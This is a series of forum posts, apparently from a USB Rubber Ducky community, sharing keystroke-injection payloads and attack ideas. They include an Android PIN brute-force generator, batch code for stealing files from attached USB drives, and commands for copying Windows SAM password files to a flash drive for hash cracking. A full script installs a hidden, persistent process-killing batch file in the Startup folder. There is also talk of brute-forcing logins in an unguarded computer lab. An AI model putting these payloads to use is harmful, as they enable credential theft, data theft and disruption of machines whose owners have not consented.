[[Payload] Android Brute Force 4-digit pin]

I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.

C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; ec

ho {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$

/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTE

R\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt

C:\Users\UserName\Desktop>dir android*

Volume in drive C has no label.

Volume Serial Number is 2499-C7D7

Directory of C:\Users\UserName\Desktop

07/07/2012 01:03 AM 165 Android Paths.txt

08/30/2012 08:00 PM 50 Android SDK Path.txt

12/09/2012 02:26 PM 63 android_brute-force_0000-9999.txt

3 File(s) 278 bytes

0 Dir(s) 831,818,436,608 bytes free

C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt

DELAY 5000 ; echo {0000..9999}

STRING

DELAY 1000

ENTER

ENTER

C:\Users\UserName\Desktop>

[[Question] Is it possible for Firmware to select keyboard VID PID randomly?]

Awesome!!!

[[Question] Is it possible for Firmware to select keyboard VID PID randomly?]

I havent had a chance to take a look at the firmware source code, or look into firmware creation, but I hope to as soon as I find some more time. I was just curious, as to whether or not it is possible to create firmware that selects the type of keyboard for the duckey randomly, ex...Dell keyboard, generic logitech keyboard, etc.

My reason for asking is that it is probably just a matter of time until someone figures out how to ban the keyboard type the duckey uses.

I dont want to create any more work for the developers just yet, since I hear they are very buisy. This is just some food for thought.

[[Firmware] Introducing Naked Ducky Firmware]

Keep up the good work snake, we all know you have been working hard.

[[Payload] Starting work on a Duckey USB theft payload]

This is going to need approached from another language instead of batch. Mabe VBS, Python, or Powershell.

[[Info] Long Live the Duck - a one-year follow-up]

What would be better is a windows and or linux app that organizes payloads and does all the commands to upload to the sd card, no offence but loading payloads the current way is just as cumbersome or worse than using a gui (arduino) and a teensy. There is also an anoying bug where java needs to be added to some setting inside dos, having an app to fix common issues would be cool:-)

I was looking into making an android app that I could just select the payload from the development files on my SD card, but that quickly fell through when I couldnt find any RTF file support in android. It would be cool if we (the community) could make android gui/friendly compiler, because that would mean you could compile from your phone or tablet. Would mean mobile payload selection.

YAY, someone mentioned my SAM payload improvement on the web show!!!

[[Version 1] My Ducky Code (Teensy Prototype)]

I think I speak for a lot of duck scripters here when I say how do we program the duck with C++ like shown here? Did I miss a memo? Where the tutorial on that awesomeness?

[[Payload] Improvement to SAM payload]

Im glad people think this is cool, I will look into using SamInside or the export to NTLM hashes then cain or GPU cracker. As far as the methods of recording more than one SAM, I will look into both methods, the %computername%, and accumulating in a text file. I am a little worried with the accumulation into a text file that programs will have trouble reading the back to back encrypted data, but if all sam files are the same size, then it should'nt be a problem, as we can always parse the data via command filters/flags, or seperate it into other files later. Good points from everybody.

[[Payload] Starting work on a Duckey USB theft payload]

Started working on getting the used space on a drive, and I tried to make a "for" loop to do that too, and got some weird output. So for our resident bug hunters, does this look like a variable overflow situation?

cmd.exe /V:ON

Set /A usedSpace=0

for /R %i in (*) do Set /A usedSpace+=%~zi

Yields>

C:\>Set /A usedSpace+=8635

-1933490268

C:\>Set /A usedSpace+=5379

-1933484889

C:\>Set /A usedSpace+=22368

-1933462521

C:\>Set /A usedSpace+=2048

-1933460473

C:\>Set /A usedSpace+=844

-1933459629

C:\>Set /A usedSpace+=4726

-1933454903

C:\>Set /A usedSpace+=5182

-1933449721

C:\>Set /A usedSpace+=153298

-1933296423

C:\>Set /A usedSpace+=31

-1933296392

C:\>Set /A usedSpace+=1142784

-1932153608

C:\>Set /A usedSpace+=1630208

-1930523400

C:\>Set /A usedSpace+=540672

-1929982728

C:\>

[[Payload] Starting work on a Duckey USB theft payload]

I am starting work on a Duckey USB file theft payload. The following codes will execute directly in the command prompt, and iterate through the possible drive letters, and ignore your "evac drive" (evac==evacuation) which will have a text file on the root evac.txt. The idea is to download 7zip, install it silently, then run the commands that will search out attached USB drives, and archive the files to your USB drive. The following is the code that will find the drives, and save them to a variable so we can send their locations to the 7zip application as arguments.

REM SET THE FLAG FOR ENABLE DELAYED ENVIRONMENT VARIABLE EXPANSION

REM FROM WHAT I UNDERSTAND THERE ARE INDIRECTION PROBLEMS WHEN NOT

REM SET AND THE VARIABLE IS CALLED MULTIPLE TIMES ON THE SAME LINE

cmd.exe /V:ON

REM IF SOME TEXT IS NOT ASSIGNED TO THIS VARIABLE THE LOOP WILL FAIL AND

REM CAUSE THE VARIABLE NAME TO BE ASSIGNED TO THE BEGINNING OF THE LIST

Set targetDr=*

REM THE FOR LOOP THAT SEEKS OUT SUITABLE DRIVES, HAS SOME NIFTY INDIRECTION

REM OPERATORS "!" WHICH ARE USED WHEN THE VARIABLE IS CALLED MULTIPLE

REM TIMES IN THE SAME LINE SO IT CAN TAKE ADVANTAGE OF THE ENABLED DELAYED

REM EXPANSION WE SET EARLIER

for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( IF NOT EXIST %a:\evac.txt If EXIST %a:\ SET targetDr=!targetDr! %a: )

REM REMOVE THE SINGLE CHARACTER OF TEXT WE ASSIGNED TO THE

REM LIST VARIABLE EARLIER

Set targetDr=%targetDr:~1%

REM SHOW ME THE OUTPUT

echo %targetDr%

The next great hurdle in this payload will be figuring out a way to determine the size of the attached drives, so we can tell whether or not it is a flash drive by its disk size. We don't want to end up trying to copy a hard drive to a flash drive that's not big enough.

If the "stealthyness" of this attack becomes a problem later, we can rely on something from the switchblade project to email the data to us.

[[Payload] Powershell Download/execute]

This power shell download seems to work a lot better than the VBS version did. I have had a lot more luck downloading from sites that didn't support whatever protocol the VBS script did.

[[BugReport] Card Stuck In Usb Rubby Ducky]

The color matters because the subsequent duck versions are all different colors. Typically each time the hardware changes the duck changes colors. I think the order goes something like this; green=version1, Red=version2, silver/white=version3, or something like that. The green ducks had a lock on the SD card that involved pulling out a lever to release the SD card, all subsequent versions are removable simply by pulling the SD card out the back(first time typically needs a pair of tweezers).

[[Question] How to find "second" Usb]

Got one of the payloads to find a second USB, short "for" loop on my posting;

http://forums.hak5.o...to-sam-payload/

Made mine specifically for the SAM theft payload, but the command can be modified.

[[Payload] Kill Process Duck Script Prank]

The following is a prank script that runs a batch loop that kills processes that you specify. A key characteristic of this particular script is that it uses a vbs script to run the batch script silently. When I was making this script I was surprised to learn that newer OSes do not run batch scripts silently. I got the vbs script someplace else, but I don't remember where. I have seen this script online on several websites though. The naming conventions of the files produced is intentionally ambiguous, ex...a.bat, b.vbs.

CONTROL ESC
DELAY 200
STRING cmd
ENTER
REM A Different directory in case the second one is inaccessable
DELAY 1000
STRING cd %userprofile%\Downloads\
ENTER
DELAY 1000
STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
ENTER
DELAY 100
REM Delete batch file if already exists
STRING erase /Q a.bat
ENTER
REM Make the batch file
STRING copy con a.bat
ENTER
DELAY 100
STRING @echo off
ENTER
STRING :Start
ENTER
STRING taskkill /f /im "iexplore.exe"
ENTER
STRING taskkill /f /im "firefox.exe"
ENTER
STRING taskkill /f /im "devenv.exe"
ENTER
STRING taskkill /f /im "pennote.exe"
ENTER
STRING timeout /t 30
ENTER
STRING Goto Start
ENTER
CONTROL Z
ENTER
DELAY 100
REM Only way to run a batch file silently on vista/Win7
REM Delete vbs file if already exists
STRING erase /Q b.vbs
ENTER
STRING copy con b.vbs
ENTER
STRING Set WshShell = CreateObject("WScript.Shell")
ENTER
STRING WshShell.Run chr(34) & "a.bat" & Chr(34), 0
ENTER
STRING Set WshShell = Nothing
CONTROL Z
ENTER
STRING b.vbs
ENTER
DELAY 100
STRING EXIT
ENTER

[[Payload] Improvement to SAM payload]

Looks like all the bugs were worked out with that last command. Anyone have some batch magic for renaming the SAM like the following;

SAM --> SAM1

--> SAM2

--> SAM3

--> SAM4

; So we can store multiple user SAM's without loosing the ones we have already collected? Also, does anyone have a program for brute forcing the password out of these SAM's?

[[Payload] Improvement to SAM payload]

I spoke a little too soon, don't use CD for change directory as I did in the first post, use the following;

for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: )

[[Payload] Improvement to SAM payload]

If you add a removable flash drive and USB hub to the duckey SAM attack (take em with you in your pocket + use the hub to plug in simultaneously) and add the file evac.txt to the flash drives root you can replace the CD <Directory> command in the SAM payload with this command which will auto-magically send the SAM file to the flash drive. If we ever get the mass storage firmware we wont even need the hub and flash drive. I am still testing this, so an additional delay may need added after this command.

STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt cd %a:\ )

[[Payload] Ms Paint Duck Script]

Unfortunately in windows vista MS paint is a little bit different. The custom color picker selects a seemingly random color slot after you input the first couple of colors. It seems unfeasible to create a duck script for this action on vista.

[[Payload] Duckscript To Open New Tabs In Internet Explorer On Insert]

Here is a tweaked version that has a delete command so the duckscript can be run multiple times on computers without any problems.
Tried to use the WRITELINE command to replace the STRING ENTER commands, but it looks like the delay command on the online compiler may not work for WRITELINE. Couldnt find a way to slow the commands down enough to prevent the script from messing up. Defaulted back to STRING ENTER commands.

REM MOBILETABS.TXT BEGINS
REM HIDE COMMAND WINDOW
CONTROL ESCAPE
STRING cmd /Q /D /T:7F /F:OFF /V:OFF /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM DELETE THE SCRIPT IF IT ALREADY EXISTS
STRING DEL /Q MobileTabs.vbs
ENTER
REM VB SCRIPT FOUND AT:
REM [url="http://www.vistaheads.com/forums/microsoft-public-internetexplorer-general/438407-command-line-open-several-websites-multiple-tabs.htmlinternetexplorer"]http://www.vistahead...nternetexplorer[/url]
REM INPUT FILE MobileTabs.vbs
STRING copy con MobileTabs.vbs
ENTER
STRING on error resume next
ENTER
STRING navOpenInBackgroundTab = &h1000
ENTER
STRING set oIE = CreateObject("InternetExplorer.Application")
ENTER
STRING Set args = WScript.Arguments
ENTER
STRING oIE.Navigate2 args.Item(0)
ENTER
STRING for intx = 1 to args.count
ENTER
STRING oIE.Navigate2 args.Item(intx), navOpenInBackgroundTab
ENTER
STRING next
ENTER
STRING oIE.Visible = true
ENTER
CONTROL Z
ENTER
REM LATER WILL TYPE THE WEBSITES TO A TEXT FILE,
REM AND SEND THE FILE TO THE VB SCRIPT
REM RUN THE VB SCRIPT TO LAUNCH INTERNET EXPLORER
STRING MobileTabs.vbs [url="http://www.google.com/"]http://www.google.com/[/url] [url="http://mwomercs.com/"]http://mwomercs.com/[/url] [url="http://hak5.org/"]http://hak5.org/[/url] [url="http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/"]http://forums.hak5.o...b-rubber-ducky/[/url]
ENTER
 

[[Payload] Ms Paint Duck Script]

The following is some duck script I made for easily setting up the MS Paint hack from way back in episode 925. Machines secured correctly with group policies are not susceptible to this attack. You are still required to save the file correctly, and input the colors in the correct order, but they should already be in the correct order in the custom color box. This particular variant only works on Windows 7, but could be easily modified for Vista.

REM MSPAINT hack revealed by "Operator"
CONTROL ESCAPE
DELAY 200
STRING mspaint
ENTER
DELAY 1000
CTRL E
STRING 6
TAB
STRING 1
Enter
CTRL PAGEUP
REPEAT 5
REM ****FIRST COLOR****
ALT H
STRING EC
ALT R
STRING 10
TAB
STRING 0
TAB
STRING 0
ENTER
REM ****SECOND COLOR****
ALT H
STRING EC
ALT R
STRING 13
TAB
STRING 10
TAB
STRING 13
ENTER
REM ****THIRD COLOR****
ALT H
STRING EC
ALT R
STRING 100
TAB
STRING 109
TAB
STRING 99
ENTER
REM ****FOURTH COLOR****
ALT H
STRING EC
ALT R
STRING 120
TAB
STRING 101
TAB
STRING 46
ENTER
REM ****FIFTH COLOR****
ALT H
STRING EC
ALT R
STRING 0
TAB
STRING 0
TAB
STRING 101
ENTER
REM ****SIXTH COLOR****
ALT H
STRING EC
ALT R
STRING 0
TAB
STRING 0
TAB
STRING 0
ENTER

[[Question] Duckey Account Brute Forcer?]

You got a good point about just grabbing the SAM file instead of preforming a Brute force on site. I'm not really a pen tester or hacker, so I'm just starting to learn the ropes. Thanks for the reply.

[[Payload] Duckscript To Open New Tabs In Internet Explorer On Insert]

Here is some duck script I made that;
-Types in a VB Script that opens tabs in internet explorer
-Runs the VB Script with the proper arguments that opens the desired webpages in internet explorer.

Not exactly hacking, but could be useful to somebody.

The VB Script was written by somebody else and the authors post can be found at:
http://www.vistaheads.com/forums/microsoft-public-internetexplorer-general/438407-command-line-open-several-websites-multiple-tabs.html

Made the duck script specifically so I could pick up and move permalinks from databases like ebsco host to other computers and quickly open them during the research stages of papers.

REM MOBILETABS.TXT BEGINS
REM HIDE COMMAND WINDOW
CONTROL ESCAPE
STRING cmd /Q /D /T:7F /F:OFF /V:OFF /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM VB SCRIPT FOUND AT:
REM http://www.vistaheads.com/forums/microsoft-public-internetexplorer-general/438407-command-line-open-several-websites-multiple-tabs.htmlinternetexplorer
REM INPUT FILE MobileTabs.vbs
STRING copy con MobileTabs.vbs
ENTER
STRING on error resume next
ENTER
STRING navOpenInBackgroundTab = &h1000
ENTER
STRING set oIE = CreateObject("InternetExplorer.Application")
ENTER
STRING Set args = WScript.Arguments
ENTER
STRING oIE.Navigate2 args.Item(0)
ENTER
STRING for intx = 1 to args.count
ENTER
STRING oIE.Navigate2 args.Item(intx), navOpenInBackgroundTab
ENTER
STRING next
ENTER
STRING oIE.Visible = true
ENTER
CONTROL Z
Enter
REM LATER WILL TYPE THE WEBSITES TO A TEXT FILE,
REM AND SEND THE FILE TO THE VB SCRIPT
REM RUN THE VB SCRIPT TO LAUNCH INTERNET EXPLORER
STRING MobileTabs.vbs http://www.google.com/ http://mwomercs.com/ http://hak5.org/ http://forums.hak5.org/index.php?/forum/56-usb-rubber-ducky/
Enter

[[Suggestion] Move Mouse?]

Kinda resurrecting a dead topic, but actually, mouse movement could add a lot of functionality to the USB Rubber Duckey. If you know the screen size of your target, and use something like the Logitech G13 and its internal Lua scripting to grab screen pixel values, and you full screened some applications, you could use any buttons on the application with the Duckey regardless of whether they support key combos. On the same token, however you could probably program the Logitech G13 to do pretty much anything the Duckey can anyway. I prefer the Duckey though, since it is a small and flash drive like poison pill.

[[Question] Duckey Account Brute Forcer?]

I have looked around for brute forcer code, and discovered that the number of combinations required for even 4 character passwords make it impractical to impliment a duckey brute forcer. The only way to possably make this feasible would be to use something like CUPP the common user password profiler to generate a small password file, and then use a modified version of my duckscript converter or someone elses duckscript converter to turn the file to duckscript. Even then it still might prove impractical. Probably best to keep the duck running command line exploits and payloads ect.

[[Question] Duckey Account Brute Forcer?]

Does anyone know if anyone has made a duckey login brute forcer?

Any tips if I wanted to make my own?

I would probably use a java app to generate the duckscript based on a dictionary file.

If I had multiple ducks and multiple computers, say an un-gaurded computer lab, I could probably get in faster.